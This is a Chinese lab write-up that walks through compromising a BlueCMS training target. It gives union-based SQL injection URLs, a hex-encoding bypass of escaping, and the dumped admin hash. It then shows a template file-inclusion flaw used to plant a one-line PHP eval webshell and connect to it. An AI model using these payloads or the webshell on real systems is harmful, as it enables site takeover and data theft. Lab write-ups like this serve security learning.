封神台靶場:萌新也能找CMS突破


靶場地址

http://59.63.200.79:8003/bluecms/uploads/

 

 百度查詢了bluecms的相關漏洞

發現存在sql注入,且sql注入點在如下網頁

http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1

經過探測,發現字段數是7個

http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()

 

 發現是可以爆出數據庫相關信息的

爆表名

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+


document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");

根據上面爆出來的數據,我發現有兩個敏感的表名,blue_admin,blue_admin_log

爆字段

但是我這里遇到了問題

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='blue_admin')--+

初步判斷是因為轉義的原因,看到 \ 反斜杠,突然感覺有點像寬字節注入。

但錯誤並沒有解決,我去掉單引號后,識別出來的是這樣的

table_name=遙lue_admin�

這導致sql語句不正常。

我想到用編碼的方式試一下。

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e)--+


document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");

頁面無報錯,爆出字段

爆數據

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(admin_name,0x7e,pwd,0x7e) from blue_admin)--+


document.write("admin~21232f297a57a5a743894a0e4a801fc3~");

 

 掃描后台

 

 

登錄

http://59.63.200.79:8003/bluecms/uploads/admin

 登錄之后,點點點---->發現

可能存在上傳漏洞

 

 看到這里,是不是有小伙伴想到了上傳文件獲取shell。

  我試了,但是沒有成功。

  但你們可以試一試。

又繼續東點點、西點點

又有新發現

文件包含漏洞

不同瀏覽器F12顯示的位置不一樣---------上圖是火狐瀏覽器,下圖為谷歌瀏覽器。

 

利用步驟

右鍵---->編輯

 

 

 

 打開一個新標簽

復制剛剛的網址把  tpl_name  參數進行修改為你想要修改的php文件

這個php文件來源我在下面進行講解

 

 

 

 php文件來源講解

 

 

 

 修改php代碼,加入一句話木馬

@eval($_REQUEST['cmd']);

 

 

獲得getshell

使用蟻劍連接,連接失敗,我有點慌了,我又打開了菜刀。連接上了,獲得了getshell

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM